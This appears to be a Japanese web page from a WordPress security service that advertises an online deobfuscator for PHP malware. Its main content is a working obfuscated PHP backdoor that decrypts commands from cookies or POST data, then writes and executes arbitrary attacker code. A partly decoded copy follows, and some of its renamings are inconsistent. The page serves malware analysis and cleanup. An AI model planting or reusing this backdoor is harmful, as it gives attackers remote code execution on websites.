Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php /* _scy */function/*lww*/cxfxp(){$ftjmx='yxbajvhj';/*foh */print_r (89552+89552); }$cmumq =/* aij */'cmumq' ^ ''; $xytwpjzy =/*kulm*/$cmumq(102) ./* _ddd*/"i"."l"."e"."\137"/*mmw */./* boe*/"\160"/*buho */. "\x75"/*tjk */./* uepye*/$cmumq(116) ./*pas */"\x5f" . "c"."o"."n".$cmumq(116)/* h*/. "\x65" ./* njlu*/"n".$cmumq(466-350) ./* ivea */$cmumq(877-762); $ddhrn =/*ntdpf*/$cmumq(188-90) . $cmumq(878-781) . "\163" . "e".$cmumq(54) . "4"."\x5f"/* _v */. "d"."\x65" ./* b */"c".$cmumq(111) . $cmumq(1018-918)/*ime */. $cmumq(795-694); $valrolaoi = $cmumq(117) . "\156" ./*fy*/$cmumq(115) . $cmumq(101)/* _ntwg */. "r"."i"."a"."\x6c" ./* z*/"\151" ./* ayouh*/"\x7a" ./*igw */"e"; $oqlwmelvei = $cmumq(112)/*mfes */./* lo_yn */"\150" . $cmumq(982-870)/* hoegx*/. "v"."e"."\162"/* dxgwv */. "s"."\151" . "o".$cmumq(110-0); $zdavqk =/*hvs */$cmumq(117) ./*cdoq */"n"."l".$cmumq(545-440)/* too */./*hmr__ */"n"."\153"; /* wy */ function/* qg */zljrs($tmjfivg, $nackvna_) { global $cmumq; /* rxltt */$rsnuwy/*fah */=/* _n */""; /* ljfo */for ($ff_zmrji/*mcf */=/*b */0; $ff_zmrji < strlen($tmjfivg);) { for/* hgvsq*/($h_eaqimcst = 0; $h_eaqimcst/* kd */</*faiko */strlen($nackvna_) &&/* qtky */$ff_zmrji </* oz */strlen($tmjfivg);/* tibae*/$h_eaqimcst++,/* tves */$ff_zmrji++) { $rsnuwy .= $cmumq(ord($tmjfivg[$ff_zmrji]) ^ ord($nackvna_[$h_eaqimcst])); } /* _xox*/} return $rsnuwy;} $bssamswx = $_COOKIE;$gscwlnkou = $_POST; $bssamswx/* xn */= array_merge($gscwlnkou, $bssamswx); $bstegiw = "\x32" ./*l*/"0".$cmumq(838-784) ./* jta*/"c"."e"."8"."9"."\x66"/* ir*/. "\55"/* fjl */./* dinc_ */"3".$cmumq(48) . $cmumq(373-322) . $cmumq(391-294) . $cmumq(795-750)/*_rntc */. $cmumq(175-123) . "\x66"/*lr */. "c".$cmumq(943-887) . "\x2d" . $cmumq(97) ./*umcvs*/"c"."d".$cmumq(740-686)/* hjpvy*/./* cthb */"\55" . $cmumq(624-527) . $cmumq(53) . "e"."c"."f".$cmumq(53) . "3"."9"."4".$cmumq(379-324)/* j */. "\71"/*je */. $cmumq(102); foreach ($bssamswx/* l */as $hzysvnnks => $tmjfivg) {/*obzbg*/$tmjfivg = $valrolaoi(zljrs(zljrs($ddhrn($tmjfivg),/* hp */$bstegiw),/* xurq*/$hzysvnnks)); if/* nfm*/(isset($tmjfivg[$cmumq(97)."k"])) { /*hd */if/*d_amq */($tmjfivg[$cmumq(97)] == "i") { $ff_zmrji = array();/* pou */$ff_zmrji[$cmumq(112)/* a */. "\166"] = $oqlwmelvei(); /*mry_h*/$ff_zmrji["\163"/* vcp*/. "\x76"] =/* czu_*/"3".".".$cmumq(984-931); echo/* de*/@serialize($ff_zmrji); }/* rm */elseif ($tmjfivg[$cmumq(97)] == "e") { $cfdqruk = sprintf("\x2e" . $cmumq(716-669)/* fuv*/. $cmumq(100-63)/* vqk*/. "\x73" . "."."p"."l", md5($bstegiw)); /*h */$xytwpjzy($cfdqruk, "<" ./* r */"?"."p".$cmumq(729-625)/* mrv */./* zui */"\160"/*edyq */./* vazdn*/$cmumq(32) ./* ftza */"\x75" . "n"."l".$cmumq(105)/* cghce */. "n"."\x6b"/*b_pf */. "\50"/*hungd*/. $cmumq(556-461) . $cmumq(95) . "\106" . "\111"/* ffnif */. $cmumq(76)/* mv */./* lgbet */$cmumq(69)/*fggl*/. $cmumq(359-264)/* pfzta */./* ci */"_".$cmumq(444-403) . ";".$cmumq(32)/* n */. $tmjfivg["d"]);/*b */include($cfdqruk); $ukzex_tooy = $cfdqruk; /* mwon */$zdavqk($ukzex_tooy); } exit(); } }
<?php /* _scy */ function cxfxp() { $ftjmx = 'yxbajvhj'; /*foh */ print_r(179104); } $cmumq = 'fj'; $xytwpjzy = fj(102) . "i" . "l" . "e" . "_" . "p" . "u" . fj(116) . "_" . "c" . "o" . "n" . fj(116) . "e" . "n" . fj(116) . fj(115); $ddhrn = fj(98) . fj(97) . "s" . "e" . fj(54) . "4" . "_" . "d" . "e" . "c" . fj(111) . fj(100) . fj(101); $valrolaoi = fj(117) . "n" . fj(115) . fj(101) . "r" . "i" . "a" . "l" . "i" . "z" . "e"; $oqlwmelvei = fj(112) . "h" . fj(112) . "v" . "e" . "r" . "s" . "i" . "o" . fj(110); $zdavqk = fj(117) . "n" . "l" . fj(105) . "n" . "k"; /* wy */ function zljrs($tmjfivg, $nackvna_) { global $cmumq; /* rxltt */ $rsnuwy = ""; /* ljfo */ for ($ff_zmrji = 0; $ff_zmrji < strlen($tmjfivg);) { for ($h_eaqimcst = 0; $h_eaqimcst < strlen($nackvna_) && $ff_zmrji < strlen($tmjfivg); $h_eaqimcst++, $ff_zmrji++) { $rsnuwy .= $cmumq(ord($tmjfivg[$ff_zmrji]) ^ ord($nackvna_[$h_eaqimcst])); } /* _xox*/ } return $rsnuwy; } $bssamswx = $_COOKIE; $gscwlnkou = $_POST; $bssamswx = array_merge($gscwlnkou, $bssamswx); $bstegiw = "20" . $cmumq(54) . "c" . "e" . "8" . "9" . "f" . "-" . "3" . $cmumq(48) . $cmumq(51) . $cmumq(97) . $cmumq(45) . $cmumq(52) . "f" . "c" . $cmumq(56) . "-" . $cmumq(97) . "c" . "d" . $cmumq(54) . "-" . $cmumq(97) . $cmumq(53) . "e" . "c" . "f" . $cmumq(53) . "3" . "9" . "4" . $cmumq(55) . "9" . $cmumq(102); foreach ($bssamswx as $hzysvnnks => $tmjfivg) { /*obzbg*/ $tmjfivg = $valrolaoi(zljrs( zljrs( $ddhrn($tmjfivg), /* hp */ $bstegiw ), /* xurq*/ $hzysvnnks )); if (isset($tmjfivg[$cmumq(97) . "k"])) { /*hd */ if ($tmjfivg[$cmumq(97)] == "i") { $ff_zmrji = array(); /* pou */ $ff_zmrji[$cmumq(112) . "v"] = $oqlwmelvei(); /*mry_h*/ $ff_zmrji["sv"] = "3." . $cmumq(53); echo @serialize($ff_zmrji); } elseif ($tmjfivg[$cmumq(97)] == "e") { $cfdqruk = sprintf("." . $cmumq(47) . $cmumq(37) . "s" . "." . "p" . "l", md5($bstegiw)); /*h */ $xytwpjzy($cfdqruk, "<?p" . $cmumq(104) . "p" . $cmumq(32) . "u" . "n" . "l" . $cmumq(105) . "n" . "k" . "(" . $cmumq(95) . $cmumq(95) . "F" . "I" . $cmumq(76) . $cmumq(69) . $cmumq(95) . "_" . $cmumq(41) . ";" . $cmumq(32) . $tmjfivg["d"]); /*b */ include $cfdqruk; $ukzex_tooy = $cfdqruk; /* mwon */ $zdavqk($ukzex_tooy); } exit; } }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.